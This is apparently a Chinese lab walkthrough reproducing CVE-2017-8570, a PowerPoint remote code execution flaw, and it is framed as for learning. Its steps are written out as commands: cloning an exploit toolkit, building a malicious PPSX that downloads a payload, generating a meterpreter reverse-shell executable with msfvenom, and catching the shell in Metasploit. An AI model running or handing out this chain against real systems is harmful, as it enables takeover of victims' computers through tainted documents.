Office CVE-2017-8570漏洞复现

说明

本文仅供学习使用。如有不足,请多指正。

描述

2017年7月,微软在例行的阅读补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞。网上公布了利用代码,影响范围广泛。该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsof PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows script Component)文件。可以欺骗用户运行含有该漏洞的PPT文件导致获取和当前登录用户相同的执行权限。

漏洞影响版本

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

环境说明

  • 攻击机:kali
  • 靶机:windows2016(已安装好64位的Microsoft Office 2016)

漏洞复现

  1. 下载漏洞exp到攻击机kali上。
    git clone https://github.com/tezukanice/Office8570.git
    在这里插入图片描述
  2. 切换到Office8570目录下,然后新建目录,将原本已有的ppsx文件另存到template。
    cd Office8570
    mkdir template
    mv template.ppsx template/
    在这里插入图片描述
    ps:如果此处不想创建文件夹,可以cd cve-2017-8570_toolkit.py进入文件中修改路径:
    在这里插入图片描述
  3. 在本地生成恶意的PPSX文件,这里的IP是攻击机的IP:
    python2 cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://#{IP}/logo.doc
    在这里插入图片描述
  4. 在kali上使用meterpreter的反弹木马生成反弹shell的exe文件。
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=#{IP} LPORT=#{PORT} -f exe > #{filename}
    在这里插入图片描述
  5. 设置监听。等待恶意ppsx文件的执行,继而接收ppsx请求来下载执行kali本地反弹木马shell(默认在80监听,ip为攻击机的ip地址)。
    python2 cve-2017-8570_toolkit.py -M exp -e http://#{ip}/#{filename} -l #{filename}
    在这里插入图片描述
  6. 新起一个攻击机的窗口,打开metasploit工具,使用multi/handler加载攻击模块,设置监听。
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost #{ip}
lhost => #{ip}

msf6 exploit(multi/handler) > set lport #{port}
lport => #{port}

msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on #{ip}:#{port} 
  1. 将刚才生成的恶意的ppsx文件放在目标主机上执行,模拟用户点击黑客发送的恶意文件。
  2. 查看成功接收到目标机发送的获取payload的请求。
    在这里插入图片描述
  3. 查看MSF那边也已经获得shell。
    在这里插入图片描述

参考

https://zhuanlan.zhihu.com/p/40969485
http://www.noobyard.com/article/p-fiujnodz-ss.html
https://fish-o0o.github.io/2018/06/26/CVE-2017-8570

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值